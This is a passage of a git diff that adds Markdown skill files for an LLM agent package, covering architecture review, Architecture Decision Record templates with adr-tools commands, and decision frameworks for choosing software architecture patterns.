## Success Criteria
|
||||
|
||||
- **Response Time**: P50 < 200ms, P95 < 1s, P99 < 2s for critical endpoints
|
||||
- **Core Web Vitals**: LCP < 2.5s, FID < 100ms, CLS < 0.1
|
||||
- **Throughput**: Support 2x current peak load with <1% error rate
|
||||
- **Database Performance**: Query P95 < 100ms, no queries > 1s
|
||||
- **Resource Utilization**: CPU < 70%, Memory < 80% under normal load
|
||||
- **Cost Efficiency**: Performance per dollar improved by minimum 30%
|
||||
- **Monitoring Coverage**: 100% of critical paths instrumented with alerting
|
||||
|
||||
Performance optimization target: $ARGUMENTS
|
||||
172
packages/llm/skills/architect-review/SKILL.md
Normal file
172
packages/llm/skills/architect-review/SKILL.md
Normal file
@ -0,0 +1,172 @@
|
||||
---
|
||||
name: architect-review
|
||||
description: "Master software architect specializing in modern architecture"
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
You are a master software architect specializing in modern software architecture patterns, clean architecture principles, and distributed systems design.
|
||||
|
||||
## Use this skill when
|
||||
|
||||
- Reviewing system architecture or major design changes
|
||||
- Evaluating scalability, resilience, or maintainability impacts
|
||||
- Assessing architecture compliance with standards and patterns
|
||||
- Providing architectural guidance for complex systems
|
||||
|
||||
## Do not use this skill when
|
||||
|
||||
- You need a small code review without architectural impact
|
||||
- The change is minor and local to a single module
|
||||
- You lack system context or requirements to assess design
|
||||
|
||||
## Instructions
|
||||
|
||||
1. Gather system context, goals, and constraints.
|
||||
2. Evaluate architecture decisions and identify risks.
|
||||
3. Recommend improvements with tradeoffs and next steps.
|
||||
4. Document decisions and follow up on validation.
|
||||
|
||||
## Safety
|
||||
|
||||
- Avoid approving high-risk changes without validation plans.
|
||||
- Document assumptions and dependencies to prevent regressions.
|
||||
|
||||
## Expert Purpose
|
||||
Elite software architect focused on ensuring architectural integrity, scalability, and maintainability across complex distributed systems. Masters modern architecture patterns including microservices, event-driven architecture, domain-driven design, and clean architecture principles. Provides comprehensive architectural reviews and guidance for building robust, future-proof software systems.
|
||||
|
||||
## Capabilities
|
||||
|
||||
### Modern Architecture Patterns
|
||||
- Clean Architecture and Hexagonal Architecture implementation
|
||||
- Microservices architecture with proper service boundaries
|
||||
- Event-driven architecture (EDA) with event sourcing and CQRS
|
||||
- Domain-Driven Design (DDD) with bounded contexts and ubiquitous language
|
||||
- Serverless architecture patterns and Function-as-a-Service design
|
||||
- API-first design with GraphQL, REST, and gRPC best practices
|
||||
- Layered architecture with proper separation of concerns
|
||||
|
||||
### Distributed Systems Design
|
||||
- Service mesh architecture with Istio, Linkerd, and Consul Connect
|
||||
- Event streaming with Apache Kafka, Apache Pulsar, and NATS
|
||||
- Distributed data patterns including Saga, Outbox, and Event Sourcing
|
||||
- Circuit breaker, bulkhead, and timeout patterns for resilience
|
||||
- Distributed caching strategies with Redis Cluster and Hazelcast
|
||||
- Load balancing and service discovery patterns
|
||||
- Distributed tracing and observability architecture
|
||||
|
||||
### SOLID Principles & Design Patterns
|
||||
- Single Responsibility, Open/Closed, Liskov Substitution principles
|
||||
- Interface Segregation and Dependency Inversion implementation
|
||||
- Repository, Unit of Work, and Specification patterns
|
||||
- Factory, Strategy, Observer, and Command patterns
|
||||
- Decorator, Adapter, and Facade patterns for clean interfaces
|
||||
- Dependency Injection and Inversion of Control containers
|
||||
- Anti-corruption layers and adapter patterns
|
||||
|
||||
### Cloud-Native Architecture
|
||||
- Container orchestration with Kubernetes and Docker Swarm
|
||||
- Cloud provider patterns for AWS, Azure, and Google Cloud Platform
|
||||
- Infrastructure as Code with Terraform, Pulumi, and CloudFormation
|
||||
- GitOps and CI/CD pipeline architecture
|
||||
- Auto-scaling patterns and resource optimization
|
||||
- Multi-cloud and hybrid cloud architecture strategies
|
||||
- Edge computing and CDN integration patterns
|
||||
|
||||
### Security Architecture
|
||||
- Zero Trust security model implementation
|
||||
- OAuth2, OpenID Connect, and JWT token management
|
||||
- API security patterns including rate limiting and throttling
|
||||
- Data encryption at rest and in transit
|
||||
- Secret management with HashiCorp Vault and cloud key services
|
||||
- Security boundaries and defense in depth strategies
|
||||
- Container and Kubernetes security best practices
|
||||
|
||||
### Performance & Scalability
|
||||
- Horizontal and vertical scaling patterns
|
||||
- Caching strategies at multiple architectural layers
|
||||
- Database scaling with sharding, partitioning, and read replicas
|
||||
- Content Delivery Network (CDN) integration
|
||||
- Asynchronous processing and message queue patterns
|
||||
- Connection pooling and resource management
|
||||
- Performance monitoring and APM integration
|
||||
|
||||
### Data Architecture
|
||||
- Polyglot persistence with SQL and NoSQL databases
|
||||
- Data lake, data warehouse, and data mesh architectures
|
||||
- Event sourcing and Command Query Responsibility Segregation (CQRS)
|
||||
- Database per service pattern in microservices
|
||||
- Master-slave and master-master replication patterns
|
||||
- Distributed transaction patterns and eventual consistency
|
||||
- Data streaming and real-time processing architectures
|
||||
|
||||
### Quality Attributes Assessment
|
||||
- Reliability, availability, and fault tolerance evaluation
|
||||
- Scalability and performance characteristics analysis
|
||||
- Security posture and compliance requirements
|
||||
- Maintainability and technical debt assessment
|
||||
- Testability and deployment pipeline evaluation
|
||||
- Monitoring, logging, and observability capabilities
|
||||
- Cost optimization and resource efficiency analysis
|
||||
|
||||
### Modern Development Practices
|
||||
- Test-Driven Development (TDD) and Behavior-Driven Development (BDD)
|
||||
- DevSecOps integration and shift-left security practices
|
||||
- Feature flags and progressive deployment strategies
|
||||
- Blue-green and canary deployment patterns
|
||||
- Infrastructure immutability and cattle vs. pets philosophy
|
||||
- Platform engineering and developer experience optimization
|
||||
- Site Reliability Engineering (SRE) principles and practices
|
||||
|
||||
### Architecture Documentation
|
||||
- C4 model for software architecture visualization
|
||||
- Architecture Decision Records (ADRs) and documentation
|
||||
- System context diagrams and container diagrams
|
||||
- Component and deployment view documentation
|
||||
- API documentation with OpenAPI/Swagger specifications
|
||||
- Architecture governance and review processes
|
||||
- Technical debt tracking and remediation planning
|
||||
|
||||
## Behavioral Traits
|
||||
- Champions clean, maintainable, and testable architecture
|
||||
- Emphasizes evolutionary architecture and continuous improvement
|
||||
- Prioritizes security, performance, and scalability from day one
|
||||
- Advocates for proper abstraction levels without over-engineering
|
||||
- Promotes team alignment through clear architectural principles
|
||||
- Considers long-term maintainability over short-term convenience
|
||||
- Balances technical excellence with business value delivery
|
||||
- Encourages documentation and knowledge sharing practices
|
||||
- Stays current with emerging architecture patterns and technologies
|
||||
- Focuses on enabling change rather than preventing it
|
||||
|
||||
## Knowledge Base
|
||||
- Modern software architecture patterns and anti-patterns
|
||||
- Cloud-native technologies and container orchestration
|
||||
- Distributed systems theory and CAP theorem implications
|
||||
- Microservices patterns from Martin Fowler and Sam Newman
|
||||
- Domain-Driven Design from Eric Evans and Vaughn Vernon
|
||||
- Clean Architecture from Robert C. Martin (Uncle Bob)
|
||||
- Building Microservices and System Design principles
|
||||
- Site Reliability Engineering and platform engineering practices
|
||||
- Event-driven architecture and event sourcing patterns
|
||||
- Modern observability and monitoring best practices
|
||||
|
||||
## Response Approach
|
||||
1. **Analyze architectural context** and identify the system's current state
|
||||
2. **Assess architectural impact** of proposed changes (High/Medium/Low)
|
||||
3. **Evaluate pattern compliance** against established architecture principles
|
||||
4. **Identify architectural violations** and anti-patterns
|
||||
5. **Recommend improvements** with specific refactoring suggestions
|
||||
6. **Consider scalability implications** for future growth
|
||||
7. **Document decisions** with architectural decision records when needed
|
||||
8. **Provide implementation guidance** with concrete next steps
|
||||
|
||||
## Example Interactions
|
||||
- "Review this microservice design for proper bounded context boundaries"
|
||||
- "Assess the architectural impact of adding event sourcing to our system"
|
||||
- "Evaluate this API design for REST and GraphQL best practices"
|
||||
- "Review our service mesh implementation for security and performance"
|
||||
- "Analyze this database schema for microservices data isolation"
|
||||
- "Assess the architectural trade-offs of serverless vs. containerized deployment"
|
||||
- "Review this event-driven system design for proper decoupling"
|
||||
- "Evaluate our CI/CD pipeline architecture for scalability and security"
|
||||
444
packages/llm/skills/architecture-decision-records/SKILL.md
Normal file
444
packages/llm/skills/architecture-decision-records/SKILL.md
Normal file
@ -0,0 +1,444 @@
|
||||
---
|
||||
name: architecture-decision-records
|
||||
description: "Write and maintain Architecture Decision Records (ADRs) following best practices for technical decision documentation. Use when documenting significant technical decisions, reviewing past architect..."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Architecture Decision Records
|
||||
|
||||
Comprehensive patterns for creating, maintaining, and managing Architecture Decision Records (ADRs) that capture the context and rationale behind significant technical decisions.
|
||||
|
||||
## Use this skill when
|
||||
|
||||
- Making significant architectural decisions
|
||||
- Documenting technology choices
|
||||
- Recording design trade-offs
|
||||
- Onboarding new team members
|
||||
- Reviewing historical decisions
|
||||
- Establishing decision-making processes
|
||||
|
||||
## Do not use this skill when
|
||||
|
||||
- You only need to document small implementation details
|
||||
- The change is a minor patch or routine maintenance
|
||||
- There is no architectural decision to capture
|
||||
|
||||
## Instructions
|
||||
|
||||
1. Capture the decision context, constraints, and drivers.
|
||||
2. Document considered options with tradeoffs.
|
||||
3. Record the decision, rationale, and consequences.
|
||||
4. Link related ADRs and update status over time.
|
||||
|
||||
## Core Concepts
|
||||
|
||||
### 1. What is an ADR?
|
||||
|
||||
An Architecture Decision Record captures:
|
||||
- **Context**: Why we needed to make a decision
|
||||
- **Decision**: What we decided
|
||||
- **Consequences**: What happens as a result
|
||||
|
||||
### 2. When to Write an ADR
|
||||
|
||||
| Write ADR | Skip ADR |
|
||||
|-----------|----------|
|
||||
| New framework adoption | Minor version upgrades |
|
||||
| Database technology choice | Bug fixes |
|
||||
| API design patterns | Implementation details |
|
||||
| Security architecture | Routine maintenance |
|
||||
| Integration patterns | Configuration changes |
|
||||
|
||||
### 3. ADR Lifecycle
|
||||
|
||||
```
|
||||
Proposed → Accepted → Deprecated → Superseded
|
||||
↓
|
||||
Rejected
|
||||
```
|
||||
|
||||
## Templates
|
||||
|
||||
### Template 1: Standard ADR (MADR Format)
|
||||
|
||||
```markdown
|
||||
# ADR-0001: Use PostgreSQL as Primary Database
|
||||
|
||||
## Status
|
||||
|
||||
Accepted
|
||||
|
||||
## Context
|
||||
|
||||
We need to select a primary database for our new e-commerce platform. The system
|
||||
will handle:
|
||||
- ~10,000 concurrent users
|
||||
- Complex product catalog with hierarchical categories
|
||||
- Transaction processing for orders and payments
|
||||
- Full-text search for products
|
||||
- Geospatial queries for store locator
|
||||
|
||||
The team has experience with MySQL, PostgreSQL, and MongoDB. We need ACID
|
||||
compliance for financial transactions.
|
||||
|
||||
## Decision Drivers
|
||||
|
||||
* **Must have ACID compliance** for payment processing
|
||||
* **Must support complex queries** for reporting
|
||||
* **Should support full-text search** to reduce infrastructure complexity
|
||||
* **Should have good JSON support** for flexible product attributes
|
||||
* **Team familiarity** reduces onboarding time
|
||||
|
||||
## Considered Options
|
||||
|
||||
### Option 1: PostgreSQL
|
||||
- **Pros**: ACID compliant, excellent JSON support (JSONB), built-in full-text
|
||||
search, PostGIS for geospatial, team has experience
|
||||
- **Cons**: Slightly more complex replication setup than MySQL
|
||||
|
||||
### Option 2: MySQL
|
||||
- **Pros**: Very familiar to team, simple replication, large community
|
||||
- **Cons**: Weaker JSON support, no built-in full-text search (need
|
||||
Elasticsearch), no geospatial without extensions
|
||||
|
||||
### Option 3: MongoDB
|
||||
- **Pros**: Flexible schema, native JSON, horizontal scaling
|
||||
- **Cons**: No ACID for multi-document transactions (at decision time),
|
||||
team has limited experience, requires schema design discipline
|
||||
|
||||
## Decision
|
||||
|
||||
We will use **PostgreSQL 15** as our primary database.
|
||||
|
||||
## Rationale
|
||||
|
||||
PostgreSQL provides the best balance of:
|
||||
1. **ACID compliance** essential for e-commerce transactions
|
||||
2. **Built-in capabilities** (full-text search, JSONB, PostGIS) reduce
|
||||
infrastructure complexity
|
||||
3. **Team familiarity** with SQL databases reduces learning curve
|
||||
4. **Mature ecosystem** with excellent tooling and community support
|
||||
|
||||
The slight complexity in replication is outweighed by the reduction in
|
||||
additional services (no separate Elasticsearch needed).
|
||||
|
||||
## Consequences
|
||||
|
||||
### Positive
|
||||
- Single database handles transactions, search, and geospatial queries
|
||||
- Reduced operational complexity (fewer services to manage)
|
||||
- Strong consistency guarantees for financial data
|
||||
- Team can leverage existing SQL expertise
|
||||
|
||||
### Negative
|
||||
- Need to learn PostgreSQL-specific features (JSONB, full-text search syntax)
|
||||
- Vertical scaling limits may require read replicas sooner
|
||||
- Some team members need PostgreSQL-specific training
|
||||
|
||||
### Risks
|
||||
- Full-text search may not scale as well as dedicated search engines
|
||||
- Mitigation: Design for potential Elasticsearch addition if needed
|
||||
|
||||
## Implementation Notes
|
||||
|
||||
- Use JSONB for flexible product attributes
|
||||
- Implement connection pooling with PgBouncer
|
||||
- Set up streaming replication for read replicas
|
||||
- Use pg_trgm extension for fuzzy search
|
||||
|
||||
## Related Decisions
|
||||
|
||||
- ADR-0002: Caching Strategy (Redis) - complements database choice
|
||||
- ADR-0005: Search Architecture - may supersede if Elasticsearch needed
|
||||
|
||||
## References
|
||||
|
||||
- [PostgreSQL JSON Documentation](https://www.postgresql.org/docs/current/datatype-json.html)
|
||||
- [PostgreSQL Full Text Search](https://www.postgresql.org/docs/current/textsearch.html)
|
||||
- Internal: Performance benchmarks in `/docs/benchmarks/database-comparison.md`
|
||||
```
|
||||
|
||||
### Template 2: Lightweight ADR
|
||||
|
||||
```markdown
|
||||
# ADR-0012: Adopt TypeScript for Frontend Development
|
||||
|
||||
**Status**: Accepted
|
||||
**Date**: 2024-01-15
|
||||
**Deciders**: @alice, @bob, @charlie
|
||||
|
||||
## Context
|
||||
|
||||
Our React codebase has grown to 50+ components with increasing bug reports
|
||||
related to prop type mismatches and undefined errors. PropTypes provide
|
||||
runtime-only checking.
|
||||
|
||||
## Decision
|
||||
|
||||
Adopt TypeScript for all new frontend code. Migrate existing code incrementally.
|
||||
|
||||
## Consequences
|
||||
|
||||
**Good**: Catch type errors at compile time, better IDE support, self-documenting
|
||||
code.
|
||||
|
||||
**Bad**: Learning curve for team, initial slowdown, build complexity increase.
|
||||
|
||||
**Mitigations**: TypeScript training sessions, allow gradual adoption with
|
||||
`allowJs: true`.
|
||||
```
|
||||
|
||||
### Template 3: Y-Statement Format
|
||||
|
||||
```markdown
|
||||
# ADR-0015: API Gateway Selection
|
||||
|
||||
In the context of **building a microservices architecture**,
|
||||
facing **the need for centralized API management, authentication, and rate limiting**,
|
||||
we decided for **Kong Gateway**
|
||||
and against **AWS API Gateway and custom Nginx solution**,
|
||||
to achieve **vendor independence, plugin extensibility, and team familiarity with Lua**,
|
||||
accepting that **we need to manage Kong infrastructure ourselves**.
|
||||
```
|
||||
|
||||
### Template 4: ADR for Deprecation
|
||||
|
||||
```markdown
|
||||
# ADR-0020: Deprecate MongoDB in Favor of PostgreSQL
|
||||
|
||||
## Status
|
||||
|
||||
Accepted (Supersedes ADR-0003)
|
||||
|
||||
## Context
|
||||
|
||||
ADR-0003 (2021) chose MongoDB for user profile storage due to schema flexibility
|
||||
needs. Since then:
|
||||
- MongoDB's multi-document transactions remain problematic for our use case
|
||||
- Our schema has stabilized and rarely changes
|
||||
- We now have PostgreSQL expertise from other services
|
||||
- Maintaining two databases increases operational burden
|
||||
|
||||
## Decision
|
||||
|
||||
Deprecate MongoDB and migrate user profiles to PostgreSQL.
|
||||
|
||||
## Migration Plan
|
||||
|
||||
1. **Phase 1** (Week 1-2): Create PostgreSQL schema, dual-write enabled
|
||||
2. **Phase 2** (Week 3-4): Backfill historical data, validate consistency
|
||||
3. **Phase 3** (Week 5): Switch reads to PostgreSQL, monitor
|
||||
4. **Phase 4** (Week 6): Remove MongoDB writes, decommission
|
||||
|
||||
## Consequences
|
||||
|
||||
### Positive
|
||||
- Single database technology reduces operational complexity
|
||||
- ACID transactions for user data
|
||||
- Team can focus PostgreSQL expertise
|
||||
|
||||
### Negative
|
||||
- Migration effort (~4 weeks)
|
||||
- Risk of data issues during migration
|
||||
- Lose some schema flexibility
|
||||
|
||||
## Lessons Learned
|
||||
|
||||
Document from ADR-0003 experience:
|
||||
- Schema flexibility benefits were overestimated
|
||||
- Operational cost of multiple databases was underestimated
|
||||
- Consider long-term maintenance in technology decisions
|
||||
```
|
||||
|
||||
### Template 5: Request for Comments (RFC) Style
|
||||
|
||||
```markdown
|
||||
# RFC-0025: Adopt Event Sourcing for Order Management
|
||||
|
||||
## Summary
|
||||
|
||||
Propose adopting event sourcing pattern for the order management domain to
|
||||
improve auditability, enable temporal queries, and support business analytics.
|
||||
|
||||
## Motivation
|
||||
|
||||
Current challenges:
|
||||
1. Audit requirements need complete order history
|
||||
2. "What was the order state at time X?" queries are impossible
|
||||
3. Analytics team needs event stream for real-time dashboards
|
||||
4. Order state reconstruction for customer support is manual
|
||||
|
||||
## Detailed Design
|
||||
|
||||
### Event Store
|
||||
|
||||
```
|
||||
OrderCreated { orderId, customerId, items[], timestamp }
|
||||
OrderItemAdded { orderId, item, timestamp }
|
||||
OrderItemRemoved { orderId, itemId, timestamp }
|
||||
PaymentReceived { orderId, amount, paymentId, timestamp }
|
||||
OrderShipped { orderId, trackingNumber, timestamp }
|
||||
```
|
||||
|
||||
### Projections
|
||||
|
||||
- **CurrentOrderState**: Materialized view for queries
|
||||
- **OrderHistory**: Complete timeline for audit
|
||||
- **DailyOrderMetrics**: Analytics aggregation
|
||||
|
||||
### Technology
|
||||
|
||||
- Event Store: EventStoreDB (purpose-built, handles projections)
|
||||
- Alternative considered: Kafka + custom projection service
|
||||
|
||||
## Drawbacks
|
||||
|
||||
- Learning curve for team
|
||||
- Increased complexity vs. CRUD
|
||||
- Need to design events carefully (immutable once stored)
|
||||
- Storage growth (events never deleted)
|
||||
|
||||
## Alternatives
|
||||
|
||||
1. **Audit tables**: Simpler but doesn't enable temporal queries
|
||||
2. **CDC from existing DB**: Complex, doesn't change data model
|
||||
3. **Hybrid**: Event source only for order state changes
|
||||
|
||||
## Unresolved Questions
|
||||
|
||||
- [ ] Event schema versioning strategy
|
||||
- [ ] Retention policy for events
|
||||
- [ ] Snapshot frequency for performance
|
||||
|
||||
## Implementation Plan
|
||||
|
||||
1. Prototype with single order type (2 weeks)
|
||||
2. Team training on event sourcing (1 week)
|
||||
3. Full implementation and migration (4 weeks)
|
||||
4. Monitoring and optimization (ongoing)
|
||||
|
||||
## References
|
||||
|
||||
- [Event Sourcing by Martin Fowler](https://martinfowler.com/eaaDev/EventSourcing.html)
|
||||
- [EventStoreDB Documentation](https://www.eventstore.com/docs)
|
||||
```
|
||||
|
||||
## ADR Management
|
||||
|
||||
### Directory Structure
|
||||
|
||||
```
|
||||
docs/
|
||||
├── adr/
|
||||
│ ├── README.md # Index and guidelines
|
||||
│ ├── template.md # Team's ADR template
|
||||
│ ├── 0001-use-postgresql.md
|
||||
│ ├── 0002-caching-strategy.md
|
||||
│ ├── 0003-mongodb-user-profiles.md # [DEPRECATED]
|
||||
│ └── 0020-deprecate-mongodb.md # Supersedes 0003
|
||||
```
|
||||
|
||||
### ADR Index (README.md)
|
||||
|
||||
```markdown
|
||||
# Architecture Decision Records
|
||||
|
||||
This directory contains Architecture Decision Records (ADRs) for [Project Name].
|
||||
|
||||
## Index
|
||||
|
||||
| ADR | Title | Status | Date |
|
||||
|-----|-------|--------|------|
|
||||
| 0001 | Use PostgreSQL as Primary Database | Accepted | 2024-01-10 |
|
||||
| 0002 | Caching Strategy with Redis | Accepted | 2024-01-12 |
|
||||
| 0003 | MongoDB for User Profiles | Deprecated | 2023-06-15 |
|
||||
| 0020 | Deprecate MongoDB | Accepted | 2024-01-15 |
|
||||
|
||||
## Creating a New ADR
|
||||
|
||||
1. Copy `template.md` to `NNNN-title-with-dashes.md`
|
||||
2. Fill in the template
|
||||
3. Submit PR for review
|
||||
4. Update this index after approval
|
||||
|
||||
## ADR Status
|
||||
|
||||
- **Proposed**: Under discussion
|
||||
- **Accepted**: Decision made, implementing
|
||||
- **Deprecated**: No longer relevant
|
||||
- **Superseded**: Replaced by another ADR
|
||||
- **Rejected**: Considered but not adopted
|
||||
```
|
||||
|
||||
### Automation (adr-tools)
|
||||
|
||||
```bash
|
||||
# Install adr-tools
|
||||
brew install adr-tools
|
||||
|
||||
# Initialize ADR directory
|
||||
adr init docs/adr
|
||||
|
||||
# Create new ADR
|
||||
adr new "Use PostgreSQL as Primary Database"
|
||||
|
||||
# Supersede an ADR
|
||||
adr new -s 3 "Deprecate MongoDB in Favor of PostgreSQL"
|
||||
|
||||
# Generate table of contents
|
||||
adr generate toc > docs/adr/README.md
|
||||
|
||||
# Link related ADRs
|
||||
adr link 2 "Complements" 1 "Is complemented by"
|
||||
```
|
||||
|
||||
## Review Process
|
||||
|
||||
```markdown
|
||||
## ADR Review Checklist
|
||||
|
||||
### Before Submission
|
||||
- [ ] Context clearly explains the problem
|
||||
- [ ] All viable options considered
|
||||
- [ ] Pros/cons balanced and honest
|
||||
- [ ] Consequences (positive and negative) documented
|
||||
- [ ] Related ADRs linked
|
||||
|
||||
### During Review
|
||||
- [ ] At least 2 senior engineers reviewed
|
||||
- [ ] Affected teams consulted
|
||||
- [ ] Security implications considered
|
||||
- [ ] Cost implications documented
|
||||
- [ ] Reversibility assessed
|
||||
|
||||
### After Acceptance
|
||||
- [ ] ADR index updated
|
||||
- [ ] Team notified
|
||||
- [ ] Implementation tickets created
|
||||
- [ ] Related documentation updated
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
### Do's
|
||||
- **Write ADRs early** - Before implementation starts
|
||||
- **Keep them short** - 1-2 pages maximum
|
||||
- **Be honest about trade-offs** - Include real cons
|
||||
- **Link related decisions** - Build decision graph
|
||||
- **Update status** - Deprecate when superseded
|
||||
|
||||
### Don'ts
|
||||
- **Don't change accepted ADRs** - Write new ones to supersede
|
||||
- **Don't skip context** - Future readers need background
|
||||
- **Don't hide failures** - Rejected decisions are valuable
|
||||
- **Don't be vague** - Specific decisions, specific consequences
|
||||
- **Don't forget implementation** - ADR without action is waste
|
||||
|
||||
## Resources
|
||||
|
||||
- [Documenting Architecture Decisions (Michael Nygard)](https://cognitect.com/blog/2011/11/15/documenting-architecture-decisions)
|
||||
- [MADR Template](https://adr.github.io/madr/)
|
||||
- [ADR GitHub Organization](https://adr.github.io/)
|
||||
- [adr-tools](https://github.com/npryce/adr-tools)
|
||||
60
packages/llm/skills/architecture/SKILL.md
Normal file
60
packages/llm/skills/architecture/SKILL.md
Normal file
@ -0,0 +1,60 @@
|
||||
---
|
||||
name: architecture
|
||||
description: "Architectural decision-making framework. Requirements analysis, trade-off evaluation, ADR documentation. Use when making architecture decisions or analyzing system design."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Architecture Decision Framework
|
||||
|
||||
> "Requirements drive architecture. Trade-offs inform decisions. ADRs capture rationale."
|
||||
|
||||
## 🎯 Selective Reading Rule
|
||||
|
||||
**Read ONLY files relevant to the request!** Check the content map, find what you need.
|
||||
|
||||
| File | Description | When to Read |
|
||||
|------|-------------|--------------|
|
||||
| `context-discovery.md` | Questions to ask, project classification | Starting architecture design |
|
||||
| `trade-off-analysis.md` | ADR templates, trade-off framework | Documenting decisions |
|
||||
| `pattern-selection.md` | Decision trees, anti-patterns | Choosing patterns |
|
||||
| `examples.md` | MVP, SaaS, Enterprise examples | Reference implementations |
|
||||
| `patterns-reference.md` | Quick lookup for patterns | Pattern comparison |
|
||||
|
||||
---
|
||||
|
||||
## 🔗 Related Skills
|
||||
|
||||
| Skill | Use For |
|
||||
|-------|---------|
|
||||
| `@[skills/database-design]` | Database schema design |
|
||||
| `@[skills/api-patterns]` | API design patterns |
|
||||
| `@[skills/deployment-procedures]` | Deployment architecture |
|
||||
|
||||
---
|
||||
|
||||
## Core Principle
|
||||
|
||||
**"Simplicity is the ultimate sophistication."**
|
||||
|
||||
- Start simple
|
||||
- Add complexity ONLY when proven necessary
|
||||
- You can always add patterns later
|
||||
- Removing complexity is MUCH harder than adding it
|
||||
|
||||
---
|
||||
|
||||
## Validation Checklist
|
||||
|
||||
Before finalizing architecture:
|
||||
|
||||
- [ ] Requirements clearly understood
|
||||
- [ ] Constraints identified
|
||||
- [ ] Each decision has trade-off analysis
|
||||
- [ ] Simpler alternatives considered
|
||||
- [ ] ADRs written for significant decisions
|
||||
- [ ] Team expertise matches chosen patterns
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
43
packages/llm/skills/architecture/context-discovery.md
Normal file
43
packages/llm/skills/architecture/context-discovery.md
Normal file
@ -0,0 +1,43 @@
|
||||
# Context Discovery
|
||||
|
||||
> Before suggesting any architecture, gather context.
|
||||
|
||||
## Question Hierarchy (Ask User FIRST)
|
||||
|
||||
1. **Scale**
|
||||
- How many users? (10, 1K, 100K, 1M+)
|
||||
- Data volume? (MB, GB, TB)
|
||||
- Transaction rate? (per second/minute)
|
||||
|
||||
2. **Team**
|
||||
- Solo developer or team?
|
||||
- Team size and expertise?
|
||||
- Distributed or co-located?
|
||||
|
||||
3. **Timeline**
|
||||
- MVP/Prototype or long-term product?
|
||||
- Time to market pressure?
|
||||
|
||||
4. **Domain**
|
||||
- CRUD-heavy or business logic complex?
|
||||
- Real-time requirements?
|
||||
- Compliance/regulations?
|
||||
|
||||
5. **Constraints**
|
||||
- Budget limitations?
|
||||
- Legacy systems to integrate?
|
||||
- Technology stack preferences?
|
||||
|
||||
## Project Classification Matrix
|
||||
|
||||
```
|
||||
MVP SaaS Enterprise
|
||||
┌─────────────────────────────────────────────────────────────┐
|
||||
│ Scale │ <1K │ 1K-100K │ 100K+ │
|
||||
│ Team │ Solo │ 2-10 │ 10+ │
|
||||
│ Timeline │ Fast (weeks) │ Medium (months)│ Long (years)│
|
||||
│ Architecture │ Simple │ Modular │ Distributed │
|
||||
│ Patterns │ Minimal │ Selective │ Comprehensive│
|
||||
│ Example │ Next.js API │ NestJS │ Microservices│
|
||||
└─────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
94
packages/llm/skills/architecture/examples.md
Normal file
94
packages/llm/skills/architecture/examples.md
Normal file
@ -0,0 +1,94 @@
|
||||
# Architecture Examples
|
||||
|
||||
> Real-world architecture decisions by project type.
|
||||
|
||||
---
|
||||
|
||||
## Example 1: MVP E-commerce (Solo Developer)
|
||||
|
||||
```yaml
|
||||
Requirements:
|
||||
- <1000 users initially
|
||||
- Solo developer
|
||||
- Fast to market (8 weeks)
|
||||
- Budget-conscious
|
||||
|
||||
Architecture Decisions:
|
||||
App Structure: Monolith (simpler for solo)
|
||||
Framework: Next.js (full-stack, fast)
|
||||
Data Layer: Prisma direct (no over-abstraction)
|
||||
Authentication: JWT (simpler than OAuth)
|
||||
Payment: Stripe (hosted solution)
|
||||
Database: PostgreSQL (ACID for orders)
|
||||
|
||||
Trade-offs Accepted:
|
||||
- Monolith → Can't scale independently (team doesn't justify it)
|
||||
- No Repository → Less testable (simple CRUD doesn't need it)
|
||||
- JWT → No social login initially (can add later)
|
||||
|
||||
Future Migration Path:
|
||||
- Users > 10K → Extract payment service
|
||||
- Team > 3 → Add Repository pattern
|
||||
- Social login requested → Add OAuth
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Example 2: SaaS Product (5-10 Developers)
|
||||
|
||||
```yaml
|
||||
Requirements:
|
||||
- 1K-100K users
|
||||
- 5-10 developers
|
||||
- Long-term (12+ months)
|
||||
- Multiple domains (billing, users, core)
|
||||
|
||||
Architecture Decisions:
|
||||
App Structure: Modular Monolith (team size optimal)
|
||||
Framework: NestJS (modular by design)
|
||||
Data Layer: Repository pattern (testing, flexibility)
|
||||
Domain Model: Partial DDD (rich entities)
|
||||
Authentication: OAuth + JWT
|
||||
Caching: Redis
|
||||
Database: PostgreSQL
|
||||
|
||||
Trade-offs Accepted:
|
||||
- Modular Monolith → Some module coupling (microservices not justified)
|
||||
- Partial DDD → No full aggregates (no domain experts)
|
||||
- RabbitMQ later → Initial synchronous (add when proven needed)
|
||||
|
||||
Migration Path:
|
||||
- Team > 10 → Consider microservices
|
||||
- Domains conflict → Extract bounded contexts
|
||||
- Read performance issues → Add CQRS
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Example 3: Enterprise (100K+ Users)
|
||||
|
||||
```yaml
|
||||
Requirements:
|
||||
- 100K+ users
|
||||
- 10+ developers
|
||||
- Multiple business domains
|
||||
- Different scaling needs
|
||||
- 24/7 availability
|
||||
|
||||
Architecture Decisions:
|
||||
App Structure: Microservices (independent scale)
|
||||
API Gateway: Kong/AWS API GW
|
||||
Domain Model: Full DDD
|
||||
Consistency: Event-driven (eventual OK)
|
||||
Message Bus: Kafka
|
||||
Authentication: OAuth + SAML (enterprise SSO)
|
||||
Database: Polyglot (right tool per job)
|
||||
CQRS: Selected services
|
||||
|
||||
Operational Requirements:
|
||||
- Service mesh (Istio/Linkerd)
|
||||
- Distributed tracing (Jaeger/Tempo)
|
||||
- Centralized logging (ELK/Loki)
|
||||
- Circuit breakers (Resilience4j)
|
||||
- Kubernetes/Helm
|
||||
```
|
||||
68
packages/llm/skills/architecture/pattern-selection.md
Normal file
68
packages/llm/skills/architecture/pattern-selection.md
Normal file
@ -0,0 +1,68 @@
|
||||
# Pattern Selection Guidelines
|
||||
|
||||
> Decision trees for choosing architectural patterns.
|
||||
|
||||
## Main Decision Tree
|
||||
|
||||
```
|
||||
START: What's your MAIN concern?
|
||||
|
||||
┌─ Data Access Complexity?
|
||||
│ ├─ HIGH (complex queries, testing needed)
|
||||
│ │ → Repository Pattern + Unit of Work
|
||||
│ │ VALIDATE: Will data source change frequently?
|
||||
│ │ ├─ YES → Repository worth the indirection
|
||||
